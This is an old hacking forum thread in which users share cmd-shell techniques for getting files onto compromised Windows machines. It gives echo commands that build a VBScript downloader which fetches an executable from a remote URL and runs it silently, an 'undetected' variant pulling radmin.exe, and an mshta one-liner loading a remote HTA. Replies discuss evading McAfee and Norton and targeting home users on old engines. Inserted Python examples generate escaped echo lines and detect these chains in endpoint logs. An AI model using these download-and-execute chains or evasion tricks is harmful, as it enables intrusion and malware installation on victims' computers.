boshcash
I strongly recommend writing the exe using the debug method if you are an experienced user; see here: http://www.governmentsecurity.org/forum/in...?showtopic=7255


This way is simple and is an addition to all the ways that usually fail. Lots of people ask what they can do with a cmd shell, and the known ways may all fail: tftp (may time out), ftp (may not connect correctly to the server, and it also needs an ftp server, and you must echo your user and pass if it doesn't allow anonymous access), and net share commands (mostly blocked by all ISPs now after the rpc exploit).


This way works by echoing a vbs file; running that vbs file downloads an exe from an http site and then executes it. You may remove execution from the vbs code (do what you want to do).

I stole that code from the known IE object data vuln and added echoing to it. Here's the text which should be put in the shell:
CODE
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs


If you want to add execution after download (it would get detected by AVs), simply add:
CODE
echo Dim WshShell>>c:\madefile.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\madefile.vbs
echo WshShell.Run "c:\file.exe", 0, False>>c:\madefile.vbs
cscript c:\madefile.vbs

You can replace the Enter after each line with "&" to make it one command, but sometimes it hangs up the cmd shell, so be careful.

Here is the UNDETECTED version by tianzhen :
CODE
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://www.finemakeit.com/client/_notes/radmin.exe",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "radmin.exe",2 >>webdown.vbs
cscript webdown.vbs


Greetz to all people, tell me your opinion about that way!
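
The post above writes the vbs one `echo` line at a time and leaves the reader to work out why some lines echo cleanly and others break. The following is an added example (not code from the thread or from boshcash) that automates that step: it turns a multi-line script into the `echo ...>file` / `echo ...>>file` commands, escaping the characters cmd.exe treats as operators (`& | < > ^`) only where cmd would interpret them, i.e. outside double quotes. It also includes a small model of what cmd's `echo` writes, so the escaping can be checked offline. The script text and target path below are constructed for the example; `%VAR%` expansion is deliberately not handled, since interactive cmd has no escape for it.

```python
"""Generate the cmd.exe 'echo' lines that recreate a script on the target.

Added example, not code from the thread. It automates what the post does by
hand: the first line of the script is written with 'echo LINE>file', every
later line with 'echo LINE>>file'. The part the post does not cover is
escaping. cmd treats & | < > ^ as operators when they appear OUTSIDE double
quotes, so a script line such as 'If n > 5 Then' must be sent as
'If n ^> 5 Then' or the '>' becomes a second redirection. Inside a quoted
string cmd leaves those characters (and '^') alone, which is why the thread's
own lines, with the URL in quotes, echo cleanly.

Not handled (interactive cmd has no escape for them): %VAR% expansion and,
if delayed expansion is on, !VAR!. Check the script for '%' and '!' first.
"""

CMD_SPECIAL = frozenset('&|<>^')


def cmd_escape(line):
    """Escape one script line so 'echo ' + result + '>>file' writes it verbatim.

    Tracks double-quote state because cmd only interprets &|<>^ outside
    quotes; a '^' inside quotes is literal and must not be added there.
    """
    out = []
    in_quotes = False
    for ch in line:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch in CMD_SPECIAL and not in_quotes:
            out.append('^')
        out.append(ch)
    return ''.join(out)


def echo_commands(script, target_path):
    """Turn a multi-line script into the cmd lines that recreate it.

    First line uses '>' (create/truncate), the rest '>>' (append). A blank
    source line becomes 'echo.' because a bare 'echo' prints 'ECHO is on.'
    instead of an empty line. No space is placed before the redirection,
    otherwise cmd would write that trailing space into the file.
    """
    cmds = []
    for i, line in enumerate(script.splitlines()):
        redirect = '>' if i == 0 else '>>'
        if not line.strip():
            cmds.append('echo.' + redirect + target_path)
        else:
            cmds.append('echo ' + cmd_escape(line) + redirect + target_path)
    return cmds


def cmd_echo_output(cmd):
    """Model what cmd's echo writes to the file for one generated line.

    Offline check for the escaper: a '^' outside quotes escapes the next
    character, everything inside quotes is literal, and the first unquoted,
    unescaped & | < > ends echo's text (it starts the redirection).
    """
    if cmd.startswith('echo.'):
        text = cmd[len('echo.'):]
    elif cmd.startswith('echo '):
        text = cmd[len('echo '):]
    else:
        raise ValueError('not an echo command: %r' % cmd)
    out = []
    in_quotes = False
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == '^' and not in_quotes:
            i += 1
            if i < len(text):
                out.append(text[i])
        elif ch in '&|<>' and not in_quotes:
            break
        else:
            out.append(ch)
        i += 1
    return ''.join(out)


def roundtrip(script, target_path):
    """Script -> echo lines -> modelled file content; equals script if escaping is right."""
    return '\n'.join(cmd_echo_output(c) for c in echo_commands(script, target_path))


# Constructed sample: the thread's first two lines plus lines that need escaping.
SAMPLE_SCRIPT = '\n'.join([
    'Set HTTPGET = CreateObject("Microsoft.XMLHTTP")',
    'HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False',
    '',
    'If Len(HTTPGET.ResponseBody) > 0 Then',
    'msg = "got > 0 bytes" & vbCrLf',
    'End If',
])

if __name__ == '__main__':
    for c in echo_commands(SAMPLE_SCRIPT, 'c:\\madefile.vbs'):
        print(c)
    assert roundtrip(SAMPLE_SCRIPT, 'c:\\madefile.vbs') == SAMPLE_SCRIPT
```

Run it to print the `echo` lines for the sample; `roundtrip` returning the original script is the check that nothing was swallowed or split by cmd. If the script contains `%` or `!`, the generated lines still need a manual look, as the docstring notes.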
vnet576
This looks like a very interesting method, I'm gonna test it out and let you know how it works for me. Thanks.
c°h°
Very nice method
Thanks
derquakecommander
I have tested it on my private PC and that's (filtered) good
Nice job dude, very nice
boshcash
I always hoped to solve this file transfer problem, and at last I found a way. It should help all the people that have problems with how to make use of their cmd shell, and that way should work 100%, not like ftp or tftp or the net share. Any problems, mail/msg me @ boshcash@msn.com
liquidSilver
Hello..

Very nice indeed. Let's see if it's useful.

Regards,
LiquidSilver
wlingard
This looks very interesting..

Great job man.. gonna test it also!

Thanks!!

//SiGN
dennis28
Sweet, I'm going to test it
Wolfman
I ran it on my system (WinXP SP1) and had 2 errors (see pic).
Nevertheless, the file still got downloaded.

Thanks for sharing.
boshcash
Well, if it's an error in the last three lines, they are not required because they execute the downloaded file. So if you don't want the download to be executed after download, or you have an error at the last three lines, simply remove them so the last line will be BinaryStream.SaveToFile "c:\eject.exe", adSaveCreateOverWrite. Any other help, mail/msg me @ boshcash@msn.com
andydis
Nice one boshcosh!

When the lovebug vbs virus thing came out I wrote a batch file that echoed the whole code and executed it :-)

Compiled the batch file to a .com

and renamed the whole thing subject: my new webpage
and a domain name as the .com (the file was called a .com and the icon looked like a link but it was in fact the virus)

Very nasty piece of work and never released it :-)

The damage it could have caused :-)

Diz UK
passi
Nice, thanks dude!
Axl
Ohhhhhhhhhhh....

That's sweet!!!

10x !!
Action
McAfee reads it, so it's quite useless
Uli
Thanks for sharing
Flinston
Wow, that's useful... some unis delete tftp.exe and ftp.exe
boshcash
"Mcafee reads this so its useless"

Actually I didn't test it with McAfee, but AVs like McAfee may say it's a malicious script running, but do they stop it from running or just prompt? Second thing is that I was trying to echo a vbs file that when run turns into an exe and runs without downloading any file from the web, but this file couldn't be echoed because it had a > sign. Maybe I could find a solution, but I think this way isn't bad, and again please tell me if it just prompts you that a malicious script is running, or it stops it from running ..

And please tell me which part is blocked, the download part or the unnecessary execution part.
gman24
Norton blocks the IE download exploit. It says it's a trojan that it isn't, because the trojan most likely was dropped in that fashion. It detects the vbs files that download after they are created and about to run.

I bypassed the malicious scripting on McAfee by recoding it so the functions look different but do the same thing. I tried doing that to a greater extent after Norton blocked the code that I had and detected it as that trojan. The only time it will cease detecting is if the declaration of the XML variable is removed. I'm working on trying to get around this.
daguilar01
I have Norton and it kept telling me it was malicious code, so I just removed the last line of the echo that ran the file, and now Norton doesn't say it's bad code, so it downloads the file but you have to run it yourself from the cmd prompt.
boshcash
Well, I edited it to be undetected by AVs (tested with Hotmail McAfee). What the AV reads is some known variables used in the IE exploit, so I changed them, and it also reads the execute command so I removed it all, and put it under the vbs echo code if some people wanna use it. Any more problems/comments?
net
Perfect thing.. thanks for sharing m8
gman24
QUOTE (boshcash @ Nov 30 2003, 12:01 PM)
Well, I edited it to be undetected by AVs (tested with Hotmail McAfee). What the AV reads is some known variables used in the IE exploit, so I changed them, and it also reads the execute command so I removed it all, and put it under the vbs echo code if some people wanna use it. Any more problems/comments?

Yeah, Norton catches it with edited variables though. It didn't originally, but someone must have done that to use it as the trojan it identifies it as.
boshcash
Mm, I don't know what to do, but this way may help many people, and if Norton detects it, I don't think that all Norton versions detect it. Any better idea to upload a file with a cmd shell, please tell me.
bANG!
Very nice, thanks
SkyRaVeR
Real nice dude! Tried it and it worked! Never thought about that kind of transferring files

greetz, sky
biboupoki
So cool, I'm going to try it right now
VIXVVXIV
Very nice job!!!
Hardcore
Creative idea for file transfer, but the newer corporate versions of both Norton and McAfee seem to catch this (probably due to the heuristic scanning or something now available).

So look for targets running older engines in a large scale environment... or home users.

Anyone know if Sophos or Trend detects this?

-Hardcore
Hardcore
And as to my ABOVE COMMENT.... to clarify...

ONLY TEST ON ENVIRONMENTS YOU ARE DULY AUTHORIZED FOR....

So if you own a multinational business, an ISP, or are superintendent of a school system...have at it!!

-Hardcore
T3cHn0b0y
Nice post m8!!!
Yorn
bosh, there's an even easier way.

create your .vbs file and save it as a .hta and then on the person's machine use:

mshta.exe http://yourfile.com/save.hta

the link to the object exploit in my .sig explains everything.
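
Both variants in this thread, the echoed vbs downloader (XMLHTTP plus ADODB.Stream, run with cscript) and the mshta one above, leave a recognisable trace in endpoint telemetry. The following is an added example (not from the thread or its posters) of the detection logic a defender would run over process-creation and file-creation events. The events are constructed in the shape of Sysmon Event ID 1 and Event ID 11 fields; the field names, the `EventType` key and the list of "trusted" script directories are assumptions to adapt to a real feed. One point the rules reflect: `echo` typed into an interactive cmd is a builtin and spawns no process, so the echo chain is only visible as cmd.exe creating a .vbs, or in a `cmd /c` command line when the `&`-joined one-liner is used; the run step (cscript/wscript from cmd.exe) and `mshta.exe` with a URL are ordinary process creations.

```python
"""Flag the download-and-run chains from this thread in endpoint telemetry.

Added example, not from the thread. The input is a constructed list of
events in the shape of Sysmon Event ID 1 (ProcessCreate) and Event ID 11
(FileCreate) fields; the field names and the 'EventType' key are assumptions
to adapt to your own feed.
"""
import re

URL_RE = re.compile(r'https?://\S+', re.I)
SCRIPT_EXT_RE = re.compile(r'\.(vbs|vbe|hta|js|wsf)\b', re.I)
# COM objects the thread's downloader uses; other VBS downloaders use the same pair.
COM_DOWNLOAD_RE = re.compile(r'Microsoft\.XMLHTTP|MSXML2\.(?:Server)?XMLHTTP|ADODB\.Stream', re.I)
# 'echo ...>file.vbs' or '>>file.vbs' inside one command line ('&'-joined variant)
ECHO_REDIRECT_RE = re.compile(r'\becho\b[^>]*>>?\s*\S+\.(vbs|vbe|hta|js|wsf)\b', re.I)
SCRIPT_ARG_RE = re.compile(r'\S+\.(vbs|vbe|js|wsf)\b', re.I)
# Assumption: scripts under these prefixes are expected; anything else
# (c:\, %TEMP%, relative paths in a writable cwd) is not.
TRUSTED_DIRS = ('c:\\windows\\', 'c:\\program files')


def _basename(path):
    return path.lower().rsplit('\\', 1)[-1]


def _trusted_script_path(path):
    return path.lower().startswith(TRUSTED_DIRS)


def classify(event):
    """Return the list of rule names an event matches (empty if none)."""
    hits = []
    image = _basename(event['Image'])
    if event['EventType'] == 'FileCreate':
        # cmd.exe does not write files except through redirection, so cmd.exe
        # creating a script file is an echo chain like the one in this thread.
        if image == 'cmd.exe' and SCRIPT_EXT_RE.search(event['TargetFilename']):
            hits.append('cmd_wrote_script_file')
        return hits
    cmdline = event['CommandLine']
    parent = _basename(event.get('ParentImage', ''))
    if image == 'cmd.exe' and ECHO_REDIRECT_RE.search(cmdline) and COM_DOWNLOAD_RE.search(cmdline):
        hits.append('cmd_c_echo_downloader')
    if image in ('cscript.exe', 'wscript.exe') and parent == 'cmd.exe':
        m = SCRIPT_ARG_RE.search(cmdline)
        if m and not _trusted_script_path(m.group(0)):
            hits.append('script_host_from_cmd_untrusted_path')
    if image == 'mshta.exe' and URL_RE.search(cmdline):
        hits.append('mshta_remote_hta')
    return hits


def scan(events):
    """Return [(index, hits)] for every event that matched at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed events. 0-3 reproduce the thread's chains; 4-6 are benign look-alikes.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c echo Set x = CreateObject("Microsoft.XMLHTTP")>c:\madefile.vbs & echo Set s = CreateObject("ADODB.Stream")>>c:\madefile.vbs'},
    {"EventType": "FileCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"c:\madefile.vbs"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript webdown.vbs"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta.exe http://yourfile.com/save.hta"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cscript.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
    {"EventType": "ProcessCreate", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c echo done>>c:\log.txt"},
    {"EventType": "FileCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\dev\script.vbs"},
]

if __name__ == '__main__':
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]['Image'], hits)
```

The benign events (a Windows-shipped .vbs run from cmd, an echo to a .txt log, an editor saving a .vbs) are there to show the rules keying on the combination that matters: a script file written by cmd.exe itself, a script host started from cmd on a path outside the expected directories, and mshta pulling its HTA from a URL. Tune `TRUSTED_DIRS` and the extension lists to your environment before relying on it.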
Max_Payne
This will be useful.. gonna test it and see which AVs are still detecting it...

Thanks dude
boshcash
Man, I just read that way today before you posted this, but I am now thinking of a good way which is undetected by AVs to use this mshta download method. It's another nice method to upload files to a remote host via cmd shell. If you test it and it bypasses AV, then please tell me. For me, I will try to work with the vbs2exe vbs files, maybe they will work but without execution on creation ..
net_runner
Very interesting, it solves a lot of downloading problems, I will try it!
wlingard
QUOTE (Yorn @ Dec 3 2003, 02:58 PM)
bosh, there's an even easier way.

create your .vbs file and save it as a .hta and then on the person's machine use:

mshta.exe http://yourfile.com/save.hta

the link to the object exploit in my .sig explains everything.

Man this is soooo sweet!

Many thanks bud!!

//WL
jubbly
That looks nice, I'm gonna give that a go
realloader

I cannot echo this line on the remote computer:
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
Whenever there is "..." I cannot. I can only echo, e.g.:
echo test>c:\test.bat
That is OK, but
echo "test">c:\test.bat
is not OK.
WHY?
I tested it on my computer and it works. But when I use it on the remote computer it doesn't.
What is the reason?
Please help me!
no1
Hey great work

<- test it

thx
temptation
Hi. Thanks for the script.. but I don't know how to execute it...
After the "echo" stuff I got a file called "madefile.vbs"..
How do I "execute" it?
Is it just like an exe file..
Do I just have to type "c:\madefile.vbs[ENTER]" in the shell?

thx
StandBy1
very nice method
Big thanx for Info

MfG
StandBy1
boshcash
temptation, of course a vbs file is run like an exe, and realloader, you may have a mistake in your echoing; if you copy the exact echo with its spaces and change what is supposed to be changed it should work fine, and it's tested remotely by the way. Maybe soon I am planning to release some document about all ways to upload files to a cmd shell, since I started with tftp and net share, then I increased my knowledge to the ftp method, then I made that vbs thing, and I learned after that the mshta thing, and I did another way with echoing, but it's still a beta thing (has some problems, but you can echo any text you want including signs and all ..
net_runner
Line 10 shows errors on execute, any idea?
QUOTE
Set HTTPGET = CreateObject("Microsoft.XMLHTTP")
HTTPGET.Open "GET", "http://hibrido.dimagna.cl/dasbest.exe", False
HTTPGET.Send
DataBin = HTTPGET.ResponseBody
Const adTypeBinary=1
Set SendBinary = CreateObject("ADODB.Stream")
SendBinary.Type = adTypeBinary
SendBinary.Open
SendBinary.Write DataBin
SendBinary.SaveToFile "c:\dasbest.exe", adSaveCreateOverWrite
boshcash
Now I can't figure out the error, but remake the code from the original one, it works 100%.
realloader
@boshcash
No.. no.. I really cannot echo it.
echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs
The first 2 lines work... but the 3rd and 4th don't work.

The IP to test it I'll give you in a PM.
Is there another way to echo the sign "test"?
esorone
Nice coding m8,

Tested on a local network and it did work :-)

Great
GogetaSSJ4
Thanks, very nice method, but it doesn't always work
Any FW stops it

bye
boshcash
Well, for users having firewalls I don't suggest dealing with them with that way; I don't like to bind a cmd shell on a port, I don't like it.
saiko13
Very nicely done... but it has flaws equal to the other ones... but still very nice and useful!
THX A BuncH!!
thegeek
Thanks man, great work :)
UnDeRTaKeR
C00L! Nice method!
Invision Power Board © 2001-2005 Invision Power Services, Inc.